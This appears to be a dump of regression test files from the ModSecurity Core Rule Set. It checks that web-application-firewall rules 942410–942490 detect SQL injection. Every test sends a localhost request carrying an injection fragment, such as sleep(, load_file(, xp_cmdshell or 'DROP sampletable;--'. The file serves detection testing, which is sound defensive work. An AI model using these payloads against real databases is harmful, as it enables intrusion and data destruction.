"942410" - test_title: 942410-31 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=floor%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-32 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=FLOOR+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-33 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=format%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-34 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=GROUP_CONCAT%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-35 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=hex%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-36 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=hEx%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-37 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if+%21%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-38 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-39 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-40 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=if%5C%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-41 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=IFNULL%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-42 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=in+%27%24%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-43 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=IN+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-44 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=IN%2F%2A%2A%2F%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-45 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=insert%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-46 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=left%27%29%3F%24%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-47 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=LEFT%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-48 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=length%7C%7C%21%21%24%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-49 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=length%7C%7C%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-50 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=length%3F%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-51 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=length%26%26%21%21%21%24%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-52 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=length%26%26%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-53 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=LENGTH%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-54 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=ln+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-55 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=ln%29+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-56 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=load_file%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-57 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=local%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-58 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=log%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-59 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=log%26%26%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-60 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=lower%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-61 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=MAKE_SET%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-62 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=MAX%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-63 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=md5%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-64 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=md5%5C%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-65 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=MID%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-66 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=minute+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-67 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=month%3D%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-68 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "name_const(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-69 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "now(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-70 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "nOW(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-71 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "ord(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-72 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "password?(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-73 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "password/?(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-74 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "Password>$(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-75 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pg_sleep(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-76 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pi(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-77 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "PI(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-78 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pow(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-79 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "POW(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-80 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "quarter. (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-81 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "rand(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-82 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "Rand (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-83 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "RAND(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-84 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "replace(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-85 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "REPLACE(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-86 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "round (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-87 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "round(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-88 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "rtrim(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-89 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "RTRIM(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-90 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=sin (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-91 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SIN(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-92 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=sleep(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-93 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SLEEP (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-94 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=strcmp(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-95 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=substr(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-96 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SUBSTR(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-97 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=substring(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-98 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "SUBSTRING(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-99 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=sysdate(" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-100 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "time (" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-101 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=time%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-102 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=trim%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-103 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=Uncompress+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-104 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=unhex%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-105 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=uNhEx%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-106 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=updatexml%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-107 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=UpdateXML%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-108 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=UPPER%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-109 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=user+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-110 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=user%2F%3F%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-111 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=user%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-112 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=values+%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-113 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=VALUES%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-114 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=version%3D%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-115 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=version%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-116 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=xmltype%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-117 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=XMLType%28" version: HTTP/1.0 output: log_contains: id "942410" - test_title: 942410-118 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=year%5D%3D%28" version: HTTP/1.0 output: log_contains: id "942410" �������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942420.yaml��������0000664�0000000�0000000�00000001102�14461225151�0027705�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942420.yaml tests: - test_title: 942420-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (8)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Cookie: "ar=%7e%7e%7e%7e%7e%7e%7e%7e%7e&foo=var" method: POST port: 80 uri: "/" version: HTTP/1.0 output: log_contains: id "942420" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942421.yaml��������0000664�0000000�0000000�00000001057�14461225151�0027717�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942421.yaml tests: - test_title: 942421-1 desc: "Restricted SQL Character Anomaly Detection (cookies): # of special characters exceeded (3)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost Cookie: "cookie=@@@@@@@@@@@@@" method: GET port: 80 uri: "/" version: HTTP/1.0 output: log_contains: id "942421" ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942430.yaml��������0000664�0000000�0000000�00000001037�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942430.yaml tests: - test_title: 942430-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=(((((())))))&var2=whatever" version: HTTP/1.0 output: log_contains: id "942430" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942431.yaml��������0000664�0000000�0000000�00000001045�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942431.yaml tests: - test_title: 942431-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=-------------------&var2=whatever" version: HTTP/1.0 output: log_contains: id "942431" �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942432.yaml��������0000664�0000000�0000000�00000001020�14461225151�0027707�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942432.yaml tests: - test_title: 942432-1 desc: "Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=;;dd foo bar" version: HTTP/1.0 output: log_contains: id "942432" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942440.yaml��������0000664�0000000�0000000�00000000730�14461225151�0027715�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christian S.J. Peron" description: None enabled: true name: 942440.yaml tests: - test_title: 942440-1 desc: "SQL Comment Sequence" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: GET port: 80 uri: "/?var=DROP%20sampletable%3b--" version: HTTP/1.0 output: log_contains: id "942440" ����������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942450.yaml��������0000664�0000000�0000000�00000004070�14461225151�0027717�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "William Woodson" description: None enabled: true name: 942450.yaml tests: - test_title: 942450-1 desc: "SQL Hex Encoding" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=%5c0xf00dsdfdsa" version: HTTP/1.0 output: log_contains: id "942450" - test_title: 942450-2 desc: "SQL Hex Encoding" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=concat%280x223e3c62723e%2Cversion%28%29%2C0x3c696d67207372633d22%29" version: HTTP/1.0 output: log_contains: id "942450" - test_title: 942450-3 desc: "SQL Hex Encoding" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=select%200x616263" version: HTTP/1.0 output: log_contains: id "942450" - test_title: 942450-4 desc: "SQL Hex Encoding - negative" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=IHRlc3Q0xAcF" version: HTTP/1.0 output: no_log_contains: id "942450" - test_title: 942450-5 desc: "SQL Hex Encoding - negative" stages: - stage: input: dest_addr: 127.0.0.1 port: 80 headers: Host: localhost method: POST uri: "/" data: "var=9F86D081884C7D659A2FEAA0C55AD015A3BF4F1B2B0B822CD15D6C15B0F00A08" version: HTTP/1.0 output: no_log_contains: id "942450" ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942470.yaml��������0000664�0000000�0000000�00000007400�14461225151�0027721�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942470.yaml tests: - test_title: 942470-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=nvarchar" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=xp_cmdshell" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-3 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=varchar" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-4 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=xp_dirtree" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-5 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=xp_regread" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-6 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=sp_password" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-7 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=UTL_HTTP" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-8 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=OPENROWSET" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-9 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "pay=sp_executesql" version: HTTP/1.0 output: log_contains: id "942470" - test_title: 942470-10 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 uri: "/" data: "sp_executesql" version: HTTP/1.0 output: log_contains: id "942470" ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942480.yaml��������0000664�0000000�0000000�00000002014�14461225151�0027716�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Jose Nazario" description: None enabled: true name: 942480.yaml tests: - test_title: 942480-1 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: "127.0.0.1" headers: Host: "localhost" Cache-Control: "no-cache, no-store, must-revalidate" method: GET port: 80 # variable name boundary attacks uri: "/?'msdasql'" version: HTTP/1.0 output: log_contains: "id \"942480" - test_title: 942480-2 desc: "SQL Injection Attack" stages: - stage: input: dest_addr: "127.0.0.1" headers: Host: "localhost" Cache-Control: "no-cache, no-store, must-revalidate" # variable name boundary attacks Cookie: "'msdasql'" method: POST port: 80 version: HTTP/1.0 output: log_contains: "id \"942480" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������modsecurity-crs-3.3.5/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942490.yaml��������0000664�0000000�0000000�00000020657�14461225151�0027734�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������--- meta: author: "Christoph Hansen" description: None enabled: true name: 942490.yaml tests: - test_title: 942490-1 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: localhost method: POST port: 80 data: "var=%22%60%20%2A%20123" version: HTTP/1.0 output: log_contains: id "942490" - test_title: 942490-2 desc: "classic SQL injection probings 3/3" stages: - stage: input: dest_addr: 127.0.0.1 headers: Host: 